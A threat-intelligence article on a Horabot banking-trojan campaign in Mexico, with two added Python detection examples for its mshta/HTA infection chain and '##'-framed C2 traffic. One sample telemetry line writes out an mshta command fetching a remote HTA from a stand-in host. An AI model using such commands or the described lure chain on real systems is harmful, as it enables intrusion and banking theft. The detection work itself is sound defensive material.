A sophisticated banking trojan known as Horabot has resurfaced in an active campaign that is currently targeting users across Mexico. This renewed assault combines a multi-stage infection chain with an email worm, effectively transforming every compromised machine into a phishing relay. The threat actors are leveraging a Delphi-based banking trojan, bolstered by a PowerShell-driven spreader, presenting one of the more layered financially motivated threats observed in the Latin American region.
The campaign was brought to light by Securelist analysts who identified suspicious mshta execution alerts within a monitored customer environment. Their investigation traced the activity back to a fake CAPTCHA page that instructs victims to open the Windows Run dialog and paste a malicious command. Instead of exploiting software vulnerabilities, the attackers trick users into executing a malicious HTA file, which silently initiates the infection chain. This method circumvents many endpoint defenses by making the victim an unwitting participant in their own compromise.
Horabot Resurfaces in Mexico with Advanced Phishing and Worm Tactics
During their analysis of the adversary’s infrastructure, researchers uncovered an exposed victim log on the attacker’s server. This log listed 5,384 infected machines, 5,030 of them (approximately 93%) located in Mexico. The data indicated that the operation had been active for months, with records extending back to May 2025, well before its discovery.
The operators behind this campaign exhibit clear connections to Brazil. Evidence supporting this includes comments within the spreader’s PowerShell code, which are written in casual Brazilian Portuguese. Additionally, the encryption key used for resource decryption incorporates the phrase “pega a visão,” a common Brazilian slang term translating to “get the picture.” The phishing emails themselves, however, are crafted in Spanish, designed to appear as fake invoices or confidential business documents specifically targeting Mexican recipients.
Multi-Stage Infection Mechanism
What distinguishes this particular Horabot campaign is not solely its payload but also its intricate delivery route, with each stage introducing a new layer of obfuscation before the final malware is deployed. Following the execution of the HTA file, it retrieves a JavaScript loader from a domain controlled by the attackers. This loader then proceeds to fetch and execute an obfuscated VBScript.
This VBScript employs server-side polymorphism, delivering a slightly altered version of the code with each request, a tactic designed to evade signature-based detection. A subsequent, more complex VBScript, exceeding 400 lines, acts as the primary execution engine for the operation. It collects the victim’s IP address, hostname, username, and operating system version and transmits this data to a command-and-control (C2) server. The script then installs AutoIT components onto the disk, establishes persistence by placing a LNK shortcut in the Startup folder, and downloads the next stage of the attack.
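The stages described above leave a recognizable parent/child pattern in process-creation telemetry. The following is an added example, not code from the Securelist report or the published detection rules: it applies heuristics derived from the chain in the article (Run-dialog lure, mshta fetching a remote HTA, script-host loaders, AutoIt stage) to constructed process-creation records whose fields are loosely modelled on Sysmon Event ID 1. The field names, sample paths and the AutoIt3.exe / .a3x naming are assumptions; whether the loaders spawn a separate script host or run inside mshta is not stated in the report, and a renamed interpreter would need a hash- or signature-based check instead.

```python
"""Heuristics for the Horabot delivery chain in process-creation telemetry.

Added example, not code from the Securelist report. Field names, sample
paths and the AutoIt3.exe / .a3x naming are assumptions for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (modelled loosely on Sysmon Event ID 1)."""
    parent_image: str
    image: str
    command_line: str


URL_RE = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
AUTOIT_SCRIPT_RE = re.compile(r"\.(a3x|au3)\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the names of every rule that fires for one event (empty if none)."""
    hits = []
    img, parent = basename(ev.image), basename(ev.parent_image)

    # Rule 1: mshta given a remote URL is the paste-into-Run-dialog lure;
    # mshta normally runs local .hta files. A command typed into the Run
    # dialog is spawned by explorer.exe, which strengthens the match.
    if img == "mshta.exe" and URL_RE.search(ev.command_line):
        hits.append("mshta_remote_hta")
        if parent == "explorer.exe":
            hits.append("mshta_from_run_dialog")

    # Rule 2: a script host spawned by mshta matches the JS/VBS loader stage
    # (assumes the loaders run in a separate wscript/cscript process).
    if parent == "mshta.exe" and img in SCRIPT_HOSTS:
        hits.append("script_host_child_of_mshta")

    # Rule 3: a script host launching the AutoIt interpreter or an AutoIt
    # script matches the stage that installs AutoIT components to disk.
    if parent in SCRIPT_HOSTS and (
        img == "autoit3.exe" or AUTOIT_SCRIPT_RE.search(ev.command_line)
    ):
        hits.append("autoit_from_script_host")
    return hits


def scan(events):
    """Return (index, rule names) for every event that triggers at least one rule."""
    flagged = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            flagged.append((i, hits))
    return flagged


# Constructed sample telemetry: three chain stages, one benign system event,
# and a benign local HTA launch that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta http://lure.example.invalid/verify.hta"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\wscript.exe",
                 r"wscript //E:vbscript C:\Users\u\AppData\Local\Temp\stage.txt"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r"C:\Users\u\AppData\Roaming\svc\AutoIt3.exe",
                 r"AutoIt3.exe C:\Users\u\AppData\Roaming\svc\run.a3x"),
    ProcessEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
                 "svchost.exe -k netsvcs"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r"mshta C:\Tools\local-dashboard.hta"),
]

if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(rules)}")
```

Rule 1 alone is the cheapest and most robust signal, since mshta with an http(s) argument is rare in managed environments; rules 2 and 3 mainly serve to raise the severity when the later stages are also seen on the same host.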
The AutoIT script is responsible for decrypting an AES-192-encrypted blob. This decryption utilizes a key derived from the seed value ‘99521487’. The resulting DLL is then loaded directly into memory. This DLL represents the core banking trojan, which communicates with its C2 server via a custom TCP protocol. Commands are encapsulated within structured tags, and all traffic is encrypted using a stateful XOR cipher. The outgoing data is notably framed between double “##” markers, a pattern that is sufficiently rare in legitimate network traffic to serve as a reliable network detection signature.
Despite the encryption, analysts observed that the cipher’s rigid and repetitive structure actually makes it more susceptible to detection by standard Intrusion Detection System (IDS) rules. Security teams are advised to proactively block HTA file execution from untrusted sources and maintain vigilant monitoring for any suspicious mshta activity. The implementation of published YARA rules for both the Horabot Delphi trojan and the AutoIT loader, alongside a Suricata rule targeting the characteristic double “##” C2 traffic pattern, will significantly aid in the early detection of infections. All shared indicators of compromise, including the attacker-controlled domains and socket addresses, should be promptly added to network blocklists. Continuing user awareness training focused on recognizing fake CAPTCHA lures and PDF attachments containing embedded buttons remains a critical layer of defense against such evolving threats.
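The double “##” framing is the detail a network analyst can act on even without knowing the XOR cipher’s key schedule. The following is an added example, not the published Suricata or YARA rules: it extracts blobs wrapped between “##” markers from a TCP payload and treats them as suspicious only when their contents look like enciphered data rather than text, which keeps Markdown headings and similar legitimate uses of “##” from firing. The exact framing beyond the “##” markers, the printable-byte threshold and the sample payloads are constructed for this example.

```python
"""Flag TCP payloads framed the way the Horabot C2 channel is described.

Added example, not the published Suricata or YARA rules. The framing detail
beyond the "##" markers and the sample bytes are constructed for this example.
"""
import re

# Non-greedy match of the shortest ## ... ## pair; DOTALL because the
# enciphered data can contain newline bytes.
FRAME_RE = re.compile(rb"##(.+?)##", re.DOTALL)
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def extract_frames(payload, min_len=4):
    """Return the byte blobs found between successive ## ... ## markers."""
    return [m.group(1) for m in FRAME_RE.finditer(payload)
            if len(m.group(1)) >= min_len]


def looks_encrypted(blob, threshold=0.3):
    """XOR-enciphered data is mostly non-printable; text between ## markers
    (for example Markdown headings) is not. Crude, but it keeps false
    positives down without knowing the cipher."""
    if not blob:
        return False
    nonprintable = sum(1 for b in blob if b not in PRINTABLE)
    return nonprintable / len(blob) >= threshold


def is_suspicious(payload, min_frames=1):
    """True when at least min_frames ##-framed, non-text blobs are present.
    Raise min_frames when running over whole streams to demand repetition."""
    frames = [f for f in extract_frames(payload) if looks_encrypted(f)]
    return len(frames) >= min_frames


# Constructed samples: two framed high-byte blobs as a stand-in for C2
# traffic, an ordinary HTTP request, and Markdown text that also uses "##".
C2_SAMPLE = (b"##" + bytes(range(0x80, 0x90)) + b"##"
             + b"##" + bytes(range(0x90, 0xA8)) + b"##")
HTTP_SAMPLE = b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
MARKDOWN_SAMPLE = b"## Release notes\nfixed ##\n## Known issues\nnone ##\n"

if __name__ == "__main__":
    for name, sample in [("c2", C2_SAMPLE), ("http", HTTP_SAMPLE),
                         ("markdown", MARKDOWN_SAMPLE)]:
        print(name, len(extract_frames(sample)), is_suspicious(sample))
```

In a real deployment this logic belongs in an IDS rule or a stream reassembler rather than a per-packet script, and the encrypted-looking check should be paired with the report’s indicators (destination socket addresses) to reduce the residual false-positive rate on binary protocols that happen to contain “##”.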